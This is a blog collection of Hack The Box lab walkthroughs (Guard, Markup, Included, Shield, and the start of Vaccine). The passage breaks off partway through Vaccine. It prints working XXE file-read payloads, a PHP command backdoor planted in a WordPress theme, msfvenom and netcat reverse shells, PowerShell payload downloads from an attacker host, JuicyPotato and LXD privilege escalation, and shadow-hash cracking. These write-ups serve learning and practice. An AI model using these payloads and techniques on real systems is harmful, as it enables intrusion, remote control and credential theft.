Category: Labs

haxez is back, back again, hacking machines, tell a friend. That’s right, back again with another writeup of a Hack The Box Machine. This time we are looking at Guard, please check out my other posts on hack Archetype, Oopsie, Vaccine, Shield, Pathfinder, Included and Markup if you haven’t already done so.

Reconnaissance

Hacking this machine was incredibly fun and it didn’t take very long. Lets get straight in to it. First thing I always like to check is whether the box responds to ping requests. This helps to determine whether the machine is online or not.

└──╼ [★]$ sudo ping 10.10.10.50 | tee -a ping.10.10.10.50.txt
 [sudo] password for joe: 
 PING 10.10.10.50 (10.10.10.50) 56(84) bytes of data.
 64 bytes from 10.10.10.50: icmp_seq=1 ttl=63 time=37.1 ms
 64 bytes from 10.10.10.50: icmp_seq=2 ttl=63 time=21.8 ms
 64 bytes from 10.10.10.50: icmp_seq=3 ttl=63 time=21.9 ms
 64 bytes from 10.10.10.50: icmp_seq=4 ttl=63 time=22.4 ms

You may notice that I tend to pipe a lot of my commands to tee -a filename.txt. This is a habbit I got in to after a few exams. I also copy the output in to a seperate text file called notes. I tend to write the walkthroughs as I hack and it doesn’t hurt to have more than one copy of something.

We know the box is responding to pings so let’s see what services are actually listening on the box. We can do this by running an nmap scan.

└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.10.10.50 | tee -a nmap.10.10.10.50.txt
 Starting Nmap 7.91 ( https://nmap.org ) at 2021–09–13 17:06 BST
 Nmap scan report for 10.10.10.50
 Host is up (0.023s latency).
 Not shown: 65535 closed ports
 PORT STATE SERVICE VERSION
 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 | 2048 2a:64:23:e0:a7:ec:1d:3b:f0:63:72:a7:d7:05:57:71 (RSA)
 | 256 b3:86:5d:3d:c9:d1:70:ea:d6:3d:36:a6:c5:f2:be:5d (ECDSA)
 |_ 256 c0:5b:13:0f:d6:e6:d1:71:2d:55:e2:4a:e2:27:0e:c2 (ED25519)
 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Foothold Hack

The only thing listening on the box appears to be SSH. We could try and bruteforce it with Hydra but I don’t think that’s the intended approach. Since SSH is the only active service I’m going to assume that we should have the credentials already from a previous box. The machine Markup had an XXE vulnerability that allowed us to recover an SSH private key for the user daniel. Lets see if that works.

└──╼ [★]$ ssh -i daniel.key [email protected]
 Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0–88-generic x86_64)
 Last login: Mon Sep 13 15:38:53 2021 from 10.10.14.31
 [email protected]:~$

Lovely jubbly the key from the last box worked a treat. We are now on the box but no matter what I tried I couldn’t cat the user.txt file. Something funny was going on. I initially tried to get a shell through Vim as I have used that technique before turns out man was our man! By using the man command we can then “escape” to a shell by typing !bash.

And now we can capture the user flag.

[email protected]:~$ cat user.txt
209**********************081

So what’s next? there is a whole lot of file system to look through and not a lot of commands at our disposal. I tried to grab linPEAS from a self hosted Python server but anything I tried to do to download it failed.

[email protected]:~$ curl http://10.10.14.38/leanpeas.sh
curl: (7) Couldn’t connect to server
[email protected]:~$ ping 10.10.14.38
ping: socket: Permission denied
[email protected]:~$ http://10.10.14.38/leanpeas.sh
bash: http://10.10.14.38/leanpeas.sh: No such file or directory
[email protected]:~$ wget http://10.10.14.38/leanpeas.sh
 — 2021–09–13 16:48:20 —  http://10.10.14.38/leanpeas.sh
Connecting to 10.10.14.38:80… failed: Permission denied.
Retrying.

Further Enumeration

Right, it looks like we don’t have permissions to access the socket at all. Not good. Well I guess it’s time for some SSH magic. You can pipe commands through SSH which should allow me to run linPEAS on the remote host from a script on my local system.

─[eu-vip-22]─[10.10.14.38]─[[email protected]]─[~]
└──╼ [★]$ sudo ssh -i daniel.key [email protected] ‘bash -s’ < /Path/To/linpeas.sh

Honestly, nothing quite beats the feeling you get when you do something hacky and it works. Now linPEAS was running on the remote host it was time to go through the output. I noticed some interesting things.

[+] Looking for ssl/ssh files
/home/picasso/.ssh/authorized_keys /usr/lib/initramfs-tools/etc/dhcp/dhclient-enter-hooks.d/config
PermitRootLogin yes
PubkeyAuthentication yes
PasswordAuthentication yes

Firstly, root could login with a password rather than requiring a public and private key pair. I’m not sure if this is going to make things harder or easier at this point but it’s good to take note of it.

[+] Looking for specific hashes inside files — less false positives (limit 70)
/var/backups/shadow:$6$2EEJjgy86KrZ.cbl$oCf1MzIsN7N9KziBNo7uYrHLueZLM7wySrsFYxlNtO5NVhfVsyWCSKiIURNUxOOwC0tm1kyQsiv93imCwLM0k1

It looks like linPEAS was able to grab a hash from a backup shadow file. This has got to be the way we get on to the box as root. lets check out the backup file.

[email protected]:~$ cat /var/backups/shadow
root:$6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31:18334:0:99999:7:::
daemon:*:18113:0:99999:7:::
---SNIP---
pollinate:*:18113:0:99999:7:::
sshd:*:18326:0:99999:7:::
daniel:$6$2EEJjgy86KrZ.cbl$oCf1MzIsN7N9KziBNo7uYrHLueZLM7wySrsFYxlNtO5NVhfVsyWCSKiIURNUxOOwC0tm1kyQsiv93imCwLM0k1:18326:0:99999:7:::

Privilege Escalation Hack

I’ve snipped out the stuff we don’t need and you can see that the backup file contains the hashes for both root and daniel. Ok let’s grab a copy of it and crack it offline. It should be noted that I also noticed I could cat the /etc/passwd file. With that in mind I grabbed a copy of that too as I was going to use unshadow and attempt to crack it with JohnTheRipper.

└──╼ [★]$ sudo unshadow passwd.txt shadow.txt > passwords.txt

Unfortunately, John didn’t like the file and was unable to crack them so I switched to hashcat with the rockyou wordlist.

└──╼ [★]$ sudo hashcat -m 1800 — force root.hash /usr/share/wordlists/rockyou.txt$6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31:password#1
 
Session……….: hashcat
Status………..: Cracked
Hash.Name……..: sha512crypt $6$, SHA512 (Unix)
Hash.Target……: $6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbv…82hY31
Time.Started…..: Mon Sep 13 17:57:10 2021, (1 min, 3 secs)
Time.Estimated…: Mon Sep 13 17:58:13 2021, (0 secs)
Guess.Base…….: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.#1………: 1751 H/s (6.91ms) @ Accel:32 Loops:512 Thr:1 Vec:4
Recovered……..: 1/1 (100.00%) Digests
Progress………: 110336/14344386 (0.77%)
Rejected………: 0/110336 (0.00%)
Restore.Point….: 110208/14344386 (0.77%)
Restore.Sub.#1…: Salt:0 Amplifier:0–1 Iteration:4608–5000
Candidates.#1….: pooh-bear -> pashaungu

The password turned out to be “password#1”. I honestly think we could have brute forced that quite quickly but alas, we were then able to login to the machine as root and capture the root flag.

└──╼ [★]$ ssh [email protected]
[email protected]’s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0–88-generic x86_64)
Last login: Mon Sep 13 15:50:13 2021 from 10.10.14.31
[email protected]:~# cat root.txt
386*******************f681

And we’re hack to hack the starter track. By that I mean it’s time to hack another machine from the Starting Point of Hack The Box. I have been going through the Starting Point machines one by one and so far we have been able to hack Archetype, Oopsie, Vaccine, Shield, Pathfinder and Included. Now it’s time to move on to Markup!

This is a great box which took me longer than it should have due to my own mistakes. Oh well, it was great fun and I felt silly after I realised what I was doing wrong.

Reconnaissance

So first we ping.

└──╼ [★]$ sudo ping 10.10.10.49 | tee -a ping.10.10.10.49.txt
[sudo] password for joe: 
PING 10.10.10.49 (10.10.10.49) 56(84) bytes of data.
64 bytes from 10.10.10.49: icmp_seq=1 ttl=127 time=240 ms

“IT IS ALIVVEE” so lets go ahead and nmap this sucker.

└──╼ [★]$ sudo nmap -sC -sV -p0- -T4 10.10.10.49
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
| 3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA)
80/tcp open http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
| http-cookie-flags: 

I’ve snipped out the parts we don’t need to see. So we have a web server and Secure Shell running. This is a Windows box right? okie dokie lets take a look at the website.

Ok so not a lot going on. I had a quick poke at it with Nikto and dirb but I didn’t find anything that interesting. Lets try the credentials we recovered from the previous box Pathfinder.

Ok great, those seem to have worked. The website has some basic functionality that allows you to place orders. If we capture the request and look at it with Burp we can see that it’s using XML. Furthermore, we can perform an XML injection (XXE External Entity Injection) attack to receive the contents of the win.ini file.

<?xml version=”1.0" encoding=”UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM “file:///c:/windows/win.ini”> ]> <order> <quantity> 1337 </quantity> <item> &xxe; </item> <address> haktheplanet </address> </order>

Foothold Hack

Ok so we know we can grab files through the XXE attack, whats next? Wasn’t there and SSH port open when we performed the nmap scan? Ok lets find out where Windows stores it’s SSH keys. So by pointing our payload at the .ssh/id_rsa file we should be able to recover the private key.

<?xml version=”1.0" encoding=”UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM 'file:///C:/Users/Daniel/.ssh/id_rsa'> ]> <order> <quantity> 1337 </quantity> <item> &xxe; </item> <address> haktheplanet </address> </order>

Ok so I grabbed the key and saved it in a file called daniel.key. Make sure to place this in a directory that you own and make sure to change the file permissions to 600. You can do that using chmod 600 file.ext. So next we try to SSH to the server with Daniels key.

Woop, we have access to the box, let’s see if we can grab the user.txt from Daniel’s desktop.

└──╼ [★]$ sudo ssh -i daniel.key [email protected]
Microsoft Windows [Version 10.0.17763.107]
© 2018 Microsoft Corporation. All rights [email protected] C:\Users\daniel>whoami
markup\[email protected] C:\Users\daniel>type C:\Users\Daniel\Desktop\user.txt 
032dXXXXXXXXXXXXXXXXX8ef7

We are on the box and have successfully captured the user flag, we need to find a way to escalate our privileges to administrator to capture that all elusive root.txt flag. I downloaded winPEAS and hosted it using the python http module. Once the file was downloaded to the target machine I ran it to see if there were any interesting files.

[email protected] C:\Users\daniel\Documents>powershell -Command (New-Object Net.WebClient).DownloadFile(‘http://10.10.14.38/winPEASany.exe', ‘win.exe’)

Ok so after a bit of digging around I found a couple of things that I thought would be useful. The first one was a password, it didn’t seem to work for the administrator though but yoink, will keep that for later.

The next thing winPEAS found was an interesting directory and file that all users appeared to have access to.

Privilege Escalation Hack

This isn’t a typical directory or file you find on a Windows system so it was worth investigating. I ran the icacls command on the file to see what permissions were assigned to it.

PS C:\Users\daniel\Documents> icacls C:\Log-Management\job.bat
C:\Log-Management\job.bat BUILTIN\Users:(F)
 NT AUTHORITY\SYSTEM:(I)(F)
 BUILTIN\Administrators:(I)(F)
 BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files

So it looks like built in users have full control over the file, that includes daniel. Ok so lets see what the file is actually doing. Using the type command it was possible to read the contents of the file.

[email protected] C:\Users\daniel\Documents>type C:\Log-Management\job.bat 
@echo off 
FOR /F “tokens=1,2*” %%V IN (‘bcdedit’) DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F “tokens=*” %%G in (‘wevtutil.exe el’) DO (call :do_clear “%%G”)
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
:theEnd
exit

So the script appears be an automated script to clear the logs but it requires being an admin to run it. So I had a look at a walkthrough at this point and noticed that others had said the script was running as a scheduled task and that whatever command you echo in to the file would be executed the next time it ran. I had a look at the scheduled tasks and couldn’t find it. I ran schtasks and there was nothing in there relating to job.bat. If you know how this was initially found then please let me know.

So with that in mind I set about dropping a copy of netcat on the box using the same method we used to deliver winPEAS.

Invoke-WebRequest http://10.10.14.38/nc64.exe -OutFile nc64.exe

Then once the file was on the box, I echoed a command in to the job.bat file to tell it to execute nc64.exe or nc.exe (whichever you want to use) and connect back to my machine.

So this is where I messed up for the longest time. It was a really really silly mistake too. In order to make my life a bit easier, I upgraded from a Command Prompt session to a PowerShell session. Then whenever I ran the following command:

echo C:\Users\Daniel\nc64.exe -e cmd.exe 10.10.14.38 1234 > C:\Log-Management\job.bat

It would error and tell me that ‘e’ was too ambiguous, who knew the letter e could be so open to interpretation. Well anyway, I spent about an hour enclosing it with quotation marks and all the other stuff you do to try and echo a string in to the file. I even went as far as to encode it with base64. The string was being echoed in to the file but the shell wasn’t coming back to my local machine. To make matters worse, the file was being overwritten every time it ran so I felt like there was a problem with the machine.

Well there wasn’t a problem with the machine, there was a problem with my brain. I dropped down to Command Prompt from PowerShell, ran the command without any quotation marks, the ‘e’ was accepted and within seconds I had a reverse shell with Administrator privileges, and then I captured the root.txt flag.

PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
f57XXXXXXXXXXXXXXXXX0f8

So if you get to this point on the machine and you’re pulling your hair out wondering why your exploit wont work. Try changing from PowerShell to CMD when echoing the string to the job.bat and see if that works. Lesson learned. One thing I did find interesting though was that I created a payload using MSFVenom and dropped that on the box. I echoed the location in to the script but still didn’t get a shell when it executed. I ran type on the file to confirm that the text had been added. Very odd.

Ok it’s time to hack another machine from the Hack The Box Starting Point series. We have already managed to hack Archetype, Oopsie, Vaccine, Shield and Pathfinder. Today we are looking at the Included machine. This was a really fun box despite a frustrating ending. This box is fairly simple to start off with provided you notice everything that is going on.

Reconnaissance

So first of all we ping the box to see if it’s up.

└──╼ [★]$ sudo ping 10.10.10.55 | tee -a ping.txt
PING 10.10.10.55 (10.10.10.55) 56(84) bytes of data.
64 bytes from 10.10.10.55: icmp_seq=1 ttl=63 time=21.5 ms

Next we run our nmap scan.

└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.10.10.55 | tee -a nmap.10.10.10.55.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021–09–11 16:30 BST
Nmap scan report for 10.10.10.55
Host is up (0.022s latency).
Not shown: 65535 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn’t have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.10.55/?file=index.php
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Ok so only a webserver is running, or is it? So I went to poke at the website and immediately saw that the website was calling the index.php using a file parameter. Caught my eye because it seemed like quite an obvious naming convention for accessing files. So naturally I pointed it straight at the /etc/passwd file and immediately had the file returned back to me.

Sweet where now? Well as other guides have mentioned, there is an interesting user in the /etc/passwd file. As you can see from the tool ouput below, the user tftp exists at the very bottom of the file with the home directory of /var/lib/tftpboot.

cat /mnt/root/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
mike:x:1000:1000:mike:/home/mike:/bin/bash
tftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin

Interesting, I confirmed that TFTP was open, it listens on UDP rather than TCP which is why our Nmap scan missed it. At this point I would also like to point out that Nessus missed the TFTP service too. It also missed the directory traversal vulnerability which I also felt was odd since I asked it to san for web vulnerabilities. Nikto also missed the directory traversal vulnerability so this is an important lesson that you can’t always rely on tools

Foothold Hack

Anyway I’m getting side tracked. I pinched the tried and tested pentestmonkey/php-reverse-shell and configured it for my IP address and port. I then uploaded the file to the machine using tftp.

└──╼ [★]$ tftp 10.10.10.55
tftp> put phpshell.php phpshell.php
Sent 5681 bytes in 0.4 seconds
tftp>

Once that was uploaded to the server I created my netcat listener and then ran curl against the URL to get a shell.

└──╼ [★]$ curl http://10.10.10.55/?file=../../../../../var/lib/tftpboot/phpshell.php

I checked out the history and ran a few other tools but nothing of much interest. There was a user called mike by listing out the /home directory. I guess this is the user we need to escalate to, to proceed further. It looks like mike has the user.txt flag in his home directory to so this confirmed my suspicious. After failing for a while I decided to try and switch user to Mike using the password found on the previous machine Pathfinder. Yeah it worked.

bash-4.4$ ls /home/mike
ls /home/mike
alpine-v3.14-x86_64–20210909_2211.tar.gz user.txt
bash-4.4$ cat /home/mike/user.txt
cat: /home/mike/user.txt: Permission denied
bash-4.4$ su mike
su mike
Password: Sheffield19

With that I was able to capture the user flag.

bash-4.4$ cat /home/mike/user.txt
cat /home/mike/user.txt
a56XXXXXXXXXXXXXXXXXXXXXXX5a1

So what next? Well it was time to perform some more enumeration on the machine. I grabbed a copy of Linpeas and hosted on my machine using Python’s simple http server. I then downloaded the script and ran it. Unfortunately, my VM crashed before I had chance to save the output but it turns out mike is a member of the lxd group.

At this point I checked the official walkthrough and attempted to follow the instructions. However for whatever reason I couldn’t get the lxd-alpine-builder script to work at all. Every time I ran the script, I just kept getting an error message telling me there was an invalid parameter. I tried to strace the script but the information it provided wasn’t much help either.

Privilege Escalation Hack

After a bit of google fu I found this awesome article by hacktricks.xyz that essentially does the same thing but differently. So, I got to following the instructions there and created the image.

sudo su
sudo apt update
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
sudo go get -d -v github.com/lxc/distrobuilder
cd $HOME/go/src/github.com/lxc/distrobuilder
make
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

With the image and the rootfs.squashfs file ready, I started the python server again and downloaded the files from my local machine to the Included machine.

[email protected]:~$ wget http://10.10.14.38/rootfs.squashfs
2021–09–11 18:02:14 —  http://10.10.14.38/rootfs.squashfs
Connecting to 10.10.14.38:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2318336 (2.2M) [application/octet-stream]
Saving to: ‘rootfs.squashfs’
rootfs.squashfs 100%[===================>] 2.21M 3.17MB/s in [email protected]:~$ wget http://10.10.14.38/lxd.tar.xz
2021–09–11 18:03:40 —  http://10.10.14.38/lxd.tar.xz
Connecting to 10.10.14.38:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 884 [application/x-xz]
Saving to: ‘lxd.tar.xz’
lxd.tar.xz 100%[===================>] 884 — .-KB/s in 0.005s

With the files now on the machine, I imported the image, configured it and ran it.

[email protected]:~$ lxc image import lxd.tar.xz rootfs.squashfs — alias alpine
[email protected]:~$ lxc init alpine privesc -c security.privileged=true
lxc init alpine privesc -c security.privileged=true
Creating privesc
[email protected]:~$ lxc list
lxc list
+ — — — — -+ — — — — -+ — — — + — — — + — — — — — — + — — — — — -+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+ — — — — -+ — — — — -+ — — — + — — — + — — — — — — + — — — — — -+
| privesc | STOPPED | | | PERSISTENT | 0 |
+ — — — — -+ — — — — -+ — — — + — — — + — — — — — — + — — — — — [email protected]:~$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
<st-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
[email protected]:~$ lxc start privesc
lxc start privesc
[email protected]:~$ lxc exec privesc /bin/sh
lxc exec privesc /bin/sh

While the shell wasn’t pretty, it did have root access and I was able to capture the final flag.

cd /mnt/root/root
/mnt/root/root # ^[[43;18Rcat root.txt
cat root.txt
c69XXXXXXXXXXXXXXXXbcf

This box gave me more trouble than I care to admit. I wouldn’t classify it as super easy that’s for sure. I have owned around 30 machines so far and this one was up there on the frustrated me list. If you’re new to the site then these posts are following the Starting Point on Hack The Box, we have already hacked Archetype, Oopsie and Vaccine.

Reconnaissance

There are other great guides out for this box and I’m not pretending that I’m the first to write a walkthrough for it. artilleryRed, eldruin and many others have written great guides which I had to use to hack this box. I’m writing this merely as a way for me to better understand the techniques used and to document my progress.

So first things first we perform our tried and tested nmap scan and wait for the results.

[10.10.15.199]─[[email protected]]─[/media/sf_admin/Shield/Output]
└──╼ [★]$ nmap -Pn -sC -sV — min-rate=1000 -T4 -p0- 10.10.10.29PORT STATE SERVICE VERSION
80/tcp open tcpwrapped
| http-methods:
|_ Supported Methods: HEAD OPTIONS
|_http-server-header: Microsoft-IIS/10.0
3306/tcp open tcpwrapped
| mysql-info:
|_ MySQL Error: Host ‘10.10.15.199’ is not allowed to connect to this MySQL server

It looks like we have a webserver and MySQL running so lets go and take a look at the webserver. Upon punching in the IP address we are greeted with a default Internet Information Services page. If we didn’t know before then we can deduct that this is a Windows box.

Ok so what else is there on this box, lets brute force the files and folders and see if there is anything that has been left behind by the creator.

[10.10.15.199]─[[email protected]]─[/media/sf_admin/Shield/Output]
└──╼ [★]$ sudo dirb http://10.10.10.29/
DIRB v2.22
By The Dark Raver
— — — — — — — — -
START_TIME: Wed Sep 8 20:37:47 2021
URL_BASE: http://10.10.10.29/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
— — — — — — — — -
GENERATED WORDS: 4612
— — Scanning URL: http://10.10.10.29/ — — 
==> DIRECTORY: http://10.10.10.29/wordpress/
— Entering directory: http://10.10.10.29/wordpress/ — — 
+ http://10.10.10.29/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://10.10.10.29/wordpress/wp-admin/
==> DIRECTORY: http://10.10.10.29/wordpress/wp-content/
==> DIRECTORY: http://10.10.10.29/wordpress/wp-includes/

Okie dokie, we have a WordPress content management system installed. WordPress is probably the most used content management system available now. It probably also has the most documentation on how you hack it to shreds. After poking at it for a bit and not making much progress I looked at a walkthrough and saw that they were using credentials that were found on a previous box. Turns out the credentials worked, while reading the official walkthrough I also noticed that they used the Metasploit module wp_admin_shell_upload to hack a shell on to the box. I tried this and had no luck what so ever. I’ve included my configuration below so you can check it and let me know if I was doing anything wrong. The exploit worked but no session was created, who knows.

Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
— — — — — — — — — — — — — — — — — — -
PASSWORD [email protected]! yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port
RHOSTS 10.10.10.29 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
USERNAME admin yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
— — — — — — — — — — — — — — — — — — — -
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Foothold Hack

So with that issue out the way I decided to log in to WordPress and poke around. I have managed to get a reverse shell before by editing the 404 PHP template and sticking a PHP reverse shell in there. In order to trigger it you just need to visit a page that doesn’t exist. Well no such luck on this machine, there is no 404 template. I tried a few other pages with PHP reverse shells but didn’t get anywhere. After this it was getting late so I gave up for the night.

The following day was much more productive. I edited the Single Post single.php file and stuck the simple-backdoor.php hack in there.

<! — Simple PHP backdoor by DK (http://michaeldaw.org) →
<?php
if(isset($_REQUEST[‘cmd’])){
 echo “<pre>”;
 $cmd = ($_REQUEST[‘cmd’]);
 system($cmd);
 echo “</pre>”;
 die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<! — http://michaeldaw.org 2006 →

This script is awesome as it allows you to execute commands through the cmd parameter. With that saved to the single.php file it was time to test whether it worked. By calling the following URL it was possible to list the files in the directory where the script was being executed from.

The following command was used to test wether the backdoor was working.

http://10.10.10.29/wordpress/wp-content/themes/highlight/single.php?cmd=dir

Now that we have command execution it is time to get on to the box via a reverse shell. In order to do this I created a reverse shell executable using MSFVenom.

sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.199 LPORT=1337 -f exe -e x86/shikata_ga_nai -i 9 -o reverse.exe

With the hack created, I started a Python webserver that the Shield machine could connect too and download it. By pasting the following URL in the browser with the additional cmd parameter commands, the machine downloads and saves the reverse shell payload locally.

http://10.10.10.29/wordpress/wp-content/themes/highlight/single.php?cmd=powershell -c “(New-Object Net.Webclient).DownloadFile(‘http://10.10.15.199/reverse.exe','C:\inetpub\wwwroot\wordpress\wp-content\themes\highlight\reverse.exe')"

With the file downloaded on to the server, we need to set up our netcat listener.

sudo nc -lvp 1337

Now time to get the reverse.exe file from the webserver.

http://10.10.10.29/wordpress/wp-content/themes/highlight/single.php?cmd=reverse.exe

Privilege Escalation Hack

Bingo we have access to the box, what now? There is lots of tools out there that you can use to gather information about the host and look for potential privilege escalation paths. One such tool is winPEAS. I won’t go into the details of finding the escalation path but it turns out I needed to use Juicy Potato hack. This part of the machine was an absolute nightmare, no matter what Class ID I used, the hack failed. Well one machine reset later and pulling the first CLSID from the list found here and I had a shell back to my host with system.

In order to do this I first downloaded and uploaded JuicyPotato to the system using the same method as the reverse.exe payload. I also did the same with nc.exe. I then created a batch file with the following payload inside.

echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.2 1111 > shell.bat

Once that was in place it was time to run JuicyPotato and invoke the shell.bat file to create a reverse shell back to my host. Make sure you have another listener running on your host ready to accept the connection.

jp.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\themes\highlight\shell.bat -l 9999 -t * -c {03ca98d6-ff5d-49b8-abc6–03dd84127020}

It was then possible to capture the root key via the newly created shell.

PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
6e9XXXXXXXXXXXXXXXXX4fa

What’s that you say? You don’t know where to begin when trying to hack something? Well, my old chum I’ve got your back. If you haven’t already done so then go back and check my other blog posts about Archetype and Oopsie. So provided you have permission to hack the target you want to hack and that the rules of engagement have been agreed upon; you start by scanning the box. There are many security tools that can scan a host for vulnerabilities. If you want something quick and easy then check out Nessus, however Nmap is an essential tool that everyone should learn.

Reconnaissance

So connect to the VPN, spin up the box and Nmap the heck out of it.

Sudo nmap -sC -sV -O -p0- 10.10.10.46
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu)

As you can see from the results, port 21 FTP (File Transfer Protocol), port 22 (Secure Shell) and port 80 (HTTP/Web Server) are exposed (not like that). The first thing I checked was whether FTP allowed Anonymous access, it didn’t. I then checked the website, but it required a login. However, after performing some post exploitation investigation on the previous box Oopsie, I found the FTP credentials ftpuser / [email protected]

★]$ ftp 10.10.10.46
Connected to 10.10.10.46.
220 (vsFTPd 3.0.3)
Name (10.10.10.46:joe): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r — r — 1 0 0 2533 Feb 03 2020 backup.zip
226 Directory send OK

Huzzah! The credentials worked and what’s that? A file called backup.zip? I needed to take a look at the contents of that zip file so I downloaded it using the get command. Once the zip file was downloaded, I tried to unzip but it promoted me for a password. The FTP password didn’t work neither did any of the passwords from the previous boxes. Luckily a tool exists that can be used to hack or crack zip file passwords. Zip2john is a tool that creates a hash from a zip file that can then be cracked using johntheripper.

─[10.10.15.199]─[[email protected]]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ zip2john backup.zip > hash.txt
─[10.10.15.199]─[[email protected]]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ cat hash.txt
